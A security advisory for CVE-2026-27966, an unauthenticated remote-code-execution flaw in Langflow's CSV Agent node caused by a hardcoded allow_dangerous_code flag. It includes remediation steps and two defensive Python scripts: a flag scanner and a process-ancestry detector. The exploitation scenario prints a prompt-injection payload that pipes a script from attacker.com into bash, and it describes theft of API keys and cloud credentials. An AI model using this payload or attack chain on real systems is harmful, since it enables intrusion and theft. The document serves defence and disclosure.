CVE-2026-27966: langflow: Code Injection enables RCE

GHSA-3645-fxcv-hqr4 | CRITICAL | PoC AVAILABLE | CISA: ATTEND
Published February 26, 2026
CISO Take

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Risk Assessment

Severity is as high as it gets for AI framework vulnerabilities. The attack requires only network access and the ability to send input to the CSV Agent—no authentication, no complex exploitation chain. The hardcoded `allow_dangerous_code=True` flag is a design-level failure that permanently exposes the Python REPL to any user input that reaches the agent. AI/ML environments running Langflow are particularly high-risk because they often process untrusted external data (documents, CSVs from users) directly through agents, and the servers typically have broad cloud permissions and access to internal APIs, model inference endpoints, and datastores. Exposure is likely widespread given Langflow's popularity in enterprise AI workflow automation.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langflow | pip | | No patch |
| langflow | pip | <= 1.8.0rc2 | No patch |

Severity & Risk

CVSS 3.1: 9.8 / 10
EPSS: 36.6% chance of exploitation in 30 days (higher than 97% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
EPSS exploit prediction: 37%
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation.
2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet.
3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials).
4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively.
5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked.
6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations.
7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags.
8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

CISA SSVC Assessment

Decision: Attend
Exploitation: poc
Automatable: Yes
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, Robustness and Cybersecurity; Art. 9 - Risk Management System
ISO 42001: 6.1.2 - AI Risk Assessment; 8.4 - AI System Risk Management; 8.7 - AI System Security
NIST AI RMF: GOVERN 1.2 - Accountability and Policies for AI Risk; GOVERN-1.7 - Processes for identifying and managing AI risks; MANAGE 2.2 - Mechanisms to Respond to and Recover from AI Risks; MANAGE-2.4 - Risks and benefits of the AI system are communicated
OWASP LLM Top 10: LLM01 - Prompt Injection; LLM01:2025 - Prompt Injection; LLM02:2025 - Insecure Output Handling; LLM07 - Insecure Plugin Design; LLM08 - Excessive Agency; LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-27966?

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Is CVE-2026-27966 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-27966, increasing the risk of exploitation.

How to fix CVE-2026-27966?

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation.
2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet.
3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials).
4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively.
5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked.
6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations.
7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags.
8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

What systems are affected by CVE-2026-27966?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM workflow automation platforms, CSV and document processing pipelines, RAG pipelines, Multi-agent orchestration systems, MLOps and AI development environments.

What is the CVSS score for CVE-2026-27966?

CVE-2026-27966 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 36.58%.

Technical Details

NVD Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.8.0, the CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). Version 1.8.0 fixes the issue.
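The hardcoded flag described above is something a source audit can find mechanically, which is what the REVIEW ARCHITECTURE recommendation asks for. The following is an added example, not Langflow or LangChain project code: it walks a Python file's AST and reports every call that passes `allow_dangerous_code` as a literal truthy value or from a variable. The sample source, the function names and the verdict labels are constructed for this illustration.

```python
import ast

# Keyword named in the advisory; add other flags you consider dangerous.
DANGEROUS_KWARGS = {"allow_dangerous_code"}

# Constructed sample, not Langflow source. It is only parsed, never imported.
SAMPLE = '''
from langchain_experimental.agents import create_csv_agent

def build(llm, path, user_opt):
    a = create_csv_agent(llm, path, allow_dangerous_code=True)
    b = create_csv_agent(llm, path, allow_dangerous_code=user_opt)
    c = create_csv_agent(llm, path, allow_dangerous_code=False)
    d = create_csv_agent(llm, path, **{"allow_dangerous_code": True})
    return a, b, c, d
'''

def _callee(node):
    """Dotted name of the called function, or '<expr>' if not a plain name."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts)) or "<expr>"

def _verdict(value):
    if isinstance(value, ast.Constant):
        return "hardcoded-true" if value.value else None  # literal False is fine
    return "dynamic"  # value comes from a variable or expression: review by hand

def find_dangerous_flags(source, filename="<src>"):
    """Return sorted (line, callee, kwarg, verdict) for every flagged call."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        pairs = [(kw.arg, kw.value) for kw in node.keywords if kw.arg]
        for kw in node.keywords:  # also unpack f(**{"flag": True})
            if kw.arg is None and isinstance(kw.value, ast.Dict):
                pairs += [(k.value, v) for k, v in zip(kw.value.keys, kw.value.values)
                          if isinstance(k, ast.Constant)]
        for name, value in pairs:
            verdict = _verdict(value) if name in DANGEROUS_KWARGS else None
            if verdict:
                findings.append((node.lineno, _callee(node), name, verdict))
    return sorted(findings)
```

Run `find_dangerous_flags` over the text of each component file in a deployment; a "dynamic" verdict means the flag's value has to be traced back to its source before the node can be considered safe.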

Exploitation Scenario

An adversary identifies a publicly accessible Langflow instance (e.g., via Shodan, exposed corporate AI portal, or leaked URL). They craft a malicious CSV file or direct prompt input to the CSV Agent node that injects a Python payload—e.g., `__import__('os').system('curl attacker.com/shell.sh | bash')`. Because `allow_dangerous_code=True` is hardcoded, the LangChain Python REPL executes the payload without restriction. The attacker establishes a reverse shell on the Langflow server, extracts environment variables containing OpenAI/Anthropic API keys, database connection strings, and AWS IAM credentials. They then pivot to the organization's vector database, exfiltrate the RAG corpus containing proprietary documents, and use the harvested cloud credentials to access S3 buckets or model registries. The entire attack chain requires zero authentication and can be automated.
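The observable step in this scenario is the Langflow server process spawning something it normally never runs, which is what the DETECT recommendation targets. The following is an added example, not part of the advisory: it rebuilds process ancestry from process-creation events and flags any unexpected descendant of the Langflow PID. The event format, the PIDs and the allowlist are constructed assumptions.

```python
import os

# Constructed events in a made-up "time pid ppid executable" format;
# map the process-creation fields of your EDR or audit log onto it.
EVENTS = """\
10:00:01 100 1 /usr/bin/python3
10:00:02 101 100 /usr/bin/python3
10:04:10 220 101 /bin/sh
10:04:11 221 220 /usr/bin/curl
10:05:00 300 1 /usr/sbin/cron
10:05:01 301 300 /bin/sh
""".splitlines()

ALLOWED = {"python3", "python"}  # assumption: binaries Langflow normally spawns

def flag_langflow_descendants(lines, langflow_pid, allowed=ALLOWED):
    """Return (time, pid, exe, depth) for unexpected processes under langflow_pid."""
    parent, alerts = {}, []
    for line in lines:
        ts, pid, ppid, exe = line.split()
        pid, ppid = int(pid), int(ppid)
        parent[pid] = ppid
        # Walk up the recorded ancestry; 'seen' guards against PID-reuse loops.
        cur, depth, seen = ppid, 1, set()
        while cur != langflow_pid and cur in parent and cur not in seen:
            seen.add(cur)
            cur, depth = parent[cur], depth + 1
        if cur == langflow_pid and os.path.basename(exe) not in allowed:
            alerts.append((ts, pid, exe, depth))
    return alerts

if __name__ == "__main__":
    for alert in flag_langflow_descendants(EVENTS, langflow_pid=100):
        print(*alert)
```

The shell started by cron (PID 301) is not reported, because only processes whose ancestry leads back to the Langflow PID are in scope.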

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: February 26, 2026
Last Modified: February 28, 2026
First Seen: February 26, 2026

Related Vulnerabilities